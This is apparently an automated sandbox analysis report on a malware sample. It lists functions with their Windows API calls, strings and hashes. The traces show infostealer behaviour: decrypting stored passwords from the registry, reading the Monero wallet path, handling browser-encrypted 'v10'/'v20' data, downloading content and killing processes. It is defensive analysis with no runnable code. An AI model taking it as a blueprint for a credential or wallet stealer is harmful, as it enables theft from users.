                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: 055a7e1b2d1574c00619839eba2d9a7cf5782a4f7785395d7c4ae8f52584bcb9
                        • Instruction ID: fe1ccf206be6b8882f295da2f4de3c5163688ad237984763d5e64837e921a0c4
                        • Opcode Fuzzy Hash: 055a7e1b2d1574c00619839eba2d9a7cf5782a4f7785395d7c4ae8f52584bcb9
                        • Instruction Fuzzy Hash: F0517B70A006029BEB14DF39D958A6BBBA8EF04741F00456ABD06EB345DF38ED54CBE4
                        Function 004477D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 208registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00447805
                        • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0044784A
                        • StrStrA.SHLWAPI(?,Password), ref: 004478B8
                          • Part of subcall function 00447750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0044775E
                          • Part of subcall function 00447750: RtlAllocateHeap.NTDLL(00000000), ref: 00447765
                          • Part of subcall function 00447750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0044778D
                          • Part of subcall function 00447750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004477AD
                          • Part of subcall function 00447750: LocalFree.KERNEL32(?), ref: 004477B7
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004478EC
                        • HeapFree.KERNEL32(00000000), ref: 004478F3
                        • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00447A35
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                        • String ID: Password
                        • API String ID: 356768136-3434357891
                        • Opcode ID: a9d2e4a8f4d5b138ecb836dc7e3d341099c048787a81fa4efc4656c0f701adbf
                        • Instruction ID: 629628d486e24949fba0e71a00e32bdf9bba2afaeb780aa9db8334a362af856c
                        • Opcode Fuzzy Hash: a9d2e4a8f4d5b138ecb836dc7e3d341099c048787a81fa4efc4656c0f701adbf
                        • Instruction Fuzzy Hash: A67131B1D0021DAFEB10DF95CC80AEEB7B9FF49300F14456AE509A7200EB756A85CFA5
                        Function 00441120 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00441135
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0044113C
                        • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00441159
                        • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00441173
                        • RegCloseKey.ADVAPI32(?), ref: 0044117D
                        Strings
                        • SOFTWARE\monero-project\monero-core, xrefs: 0044114F
                        • wallet_path, xrefs: 0044116D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                        • API String ID: 3225020163-4244082812
                        • Opcode ID: 87919bcbe2c7f81648d3c575dc6fdb8c7d3ece5d4560dca3bd0a173f694523be
                        • Instruction ID: acdece487a35c4c1dac8f0b1f1da885bca53d006ee41f5fbfe009e13c8f268c5
                        • Opcode Fuzzy Hash: 87919bcbe2c7f81648d3c575dc6fdb8c7d3ece5d4560dca3bd0a173f694523be
                        • Instruction Fuzzy Hash: CCF03075680308BFE7189BE49C4EFEB7B7DEB04755F104155FE09E2290E6B45A8487A0
                        Function 00449DE0 Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 183memorystringCOMMON
                        Download Yara Rule
                        APIs
                        • memcmp.MSVCRT(?,v20,00000003), ref: 00449E04
                        • memcmp.MSVCRT(?,v10,00000003), ref: 00449E42
                        • LocalAlloc.KERNEL32(00000040), ref: 00449EA7
                          • Part of subcall function 004671E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004671FE
                        • lstrcpy.KERNEL32(00000000,00474C48), ref: 00449FB2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpymemcmp$AllocLocal
                        • String ID: @$v10$v20
                        • API String ID: 102826412-278772428
                        • Opcode ID: a61bc1a939d5aa48046c4e264bf3c77a763fbace49a49633a999d4481034f07e
                        • Instruction ID: bfc2098adcdbeb85ece1ad7de23077da2143a5bc7a4220fa2142cc69e21a8a48
                        • Opcode Fuzzy Hash: a61bc1a939d5aa48046c4e264bf3c77a763fbace49a49633a999d4481034f07e
                        • Instruction Fuzzy Hash: 0F51B331A102099BEB10EF65DD41B9FB7A4AF44318F15402AFD09EB341DBB8ED4587D9
                        Function 00445640 Relevance: 12.1, APIs: 8, Instructions: 112networkmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0044565A
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00445661
                        • InternetOpenA.WININET(0046CFEC,00000000,00000000,00000000,00000000), ref: 00445677
                        • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00445692
                        • InternetReadFile.WININET(?,?,00000400,00000001), ref: 004456BC
                        • memcpy.MSVCRT(00000000,?,00000001), ref: 004456E1
                        • InternetCloseHandle.WININET(?), ref: 004456FA
                        • InternetCloseHandle.WININET(00000000), ref: 00445701
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                        • String ID:
                        • API String ID: 1008454911-0
                        • Opcode ID: 7f9f235aa8ce166ad4bf70f9fd1e81377afd866ce3eff01b2a9742c1e7d1c73e
                        • Instruction ID: 542437104be0d8640295e7459f21f23339f05d1bacd14efa85ed775f2925dd60
                        • Opcode Fuzzy Hash: 7f9f235aa8ce166ad4bf70f9fd1e81377afd866ce3eff01b2a9742c1e7d1c73e
                        • Instruction Fuzzy Hash: 3D417C70A00205AFEB18DF54DD88BAAB7B5FF48314F14816AE9089B391E7759981CF98
                        Function 00464740 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00464759
                        • Process32First.KERNEL32(00000000,00000128), ref: 00464769
                        • Process32Next.KERNEL32(00000000,00000128), ref: 0046477B
                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046479C
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 004647AB
                        • CloseHandle.KERNEL32(00000000), ref: 004647B2
                        • Process32Next.KERNEL32(00000000,00000128), ref: 004647C0
                        • CloseHandle.KERNEL32(00000000), ref: 004647CB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                        • String ID:
                        • API String ID: 3836391474-0
                        • Opcode ID: 46d6b6878b3954efab85a999a47525e8dc004693e46895489d8eb6cd86c77ee6
                        • Instruction ID: 98b99a146fd252bc4ed023d6a7cceea51b32e27c88aec68f1dd2ed193af22ffb
                        • Opcode Fuzzy Hash: 46d6b6878b3954efab85a999a47525e8dc004693e46895489d8eb6cd86c77ee6
                        • Instruction Fuzzy Hash: 41019271641214AFEB245F709C8DFEB77BDEB88752F001195F90D91280EF788DC08A65
                        Function 004583E0 Relevance: 10.6, APIs: 7, Instructions: 147stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(00000000), ref: 00458435
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045846C
                        • lstrlen.KERNEL32(00000000), ref: 004584B2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004584E9
                        • lstrlen.KERNEL32(00000000), ref: 004584FF
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045852E
                        • StrCmpCA.SHLWAPI(00000000,00474C3C), ref: 0045853E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: d8582f1e5f175919003cf9778703af2088094ef85d6342fc47cf3643aa8154d9
                        • Instruction ID: 42c89f51ab314136e31d8f0fa2fcb1509a1bd891d06895a4dd5f8598b395e7e8
                        • Opcode Fuzzy Hash: d8582f1e5f175919003cf9778703af2088094ef85d6342fc47cf3643aa8154d9
                        • Instruction Fuzzy Hash: E9518C71500206AFDB24DF29D984A5BB7F5EF49340B24841EEC45AB306EF38E945CB64
                        Function 00462910 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00462925
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0046292C
                        • RegOpenKeyExA.ADVAPI32(80000002,0157C208,00000000,00020119,004628A9), ref: 0046294B
                        • RegQueryValueExA.ADVAPI32(004628A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00462965
                        • RegCloseKey.ADVAPI32(004628A9), ref: 0046296F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: CurrentBuildNumber
                        • API String ID: 3225020163-1022791448
                        • Opcode ID: a0c0b21f988fd7e1efa73962716f39f67099f99fae193b89bded03b6381d7c37
                        • Instruction ID: 1e3c7a71c978464eebf7454584dc23acc8e6bcf89af0c1b7c4b4c5d0e765800a
                        • Opcode Fuzzy Hash: a0c0b21f988fd7e1efa73962716f39f67099f99fae193b89bded03b6381d7c37
                        • Instruction Fuzzy Hash: 2A01B1B5A40214BFD314CBA09C59EEB7BBDEB48755F200059FE4997240EA75594887A0
                        Function 00462880 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00462895
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0046289C
                          • Part of subcall function 00462910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00462925
                          • Part of subcall function 00462910: RtlAllocateHeap.NTDLL(00000000), ref: 0046292C
                          • Part of subcall function 00462910: RegOpenKeyExA.ADVAPI32(80000002,0157C208,00000000,00020119,004628A9), ref: 0046294B
                          • Part of subcall function 00462910: RegQueryValueExA.ADVAPI32(004628A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00462965
                          • Part of subcall function 00462910: RegCloseKey.ADVAPI32(004628A9), ref: 0046296F
                        • RegOpenKeyExA.ADVAPI32(80000002,0157C208,00000000,00020119,00459500), ref: 004628D1
                        • RegQueryValueExA.ADVAPI32(00459500,0158E268,00000000,00000000,00000000,000000FF), ref: 004628EC
                        • RegCloseKey.ADVAPI32(00459500), ref: 004628F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: Windows 11
                        • API String ID: 3225020163-2517555085
                        • Opcode ID: 5b64299f176952ccb11e456a4417751734a97e16a5d5d35471b9fdb2232bbdbf
                        • Instruction ID: 9e89fb6a2a198db35d0c029d964a16976c80dcc99e5496789f731f01b003c878
                        • Opcode Fuzzy Hash: 5b64299f176952ccb11e456a4417751734a97e16a5d5d35471b9fdb2232bbdbf
                        • Instruction Fuzzy Hash: FD01A2B1640208BFD718ABA4AD4DEAA776EEB44715F004159FE0CD7250EAB45D8487A1
                        Function 004471F0 Relevance: 9.1, APIs: 6, Instructions: 142memorylibraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(?), ref: 0044723E
                        • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00447279
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00447280
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 004472C3
                        • HeapFree.KERNEL32(00000000), ref: 004472CA
                        • GetProcAddress.KERNEL32(00000000,?), ref: 00447329
                        Memory Dump Source
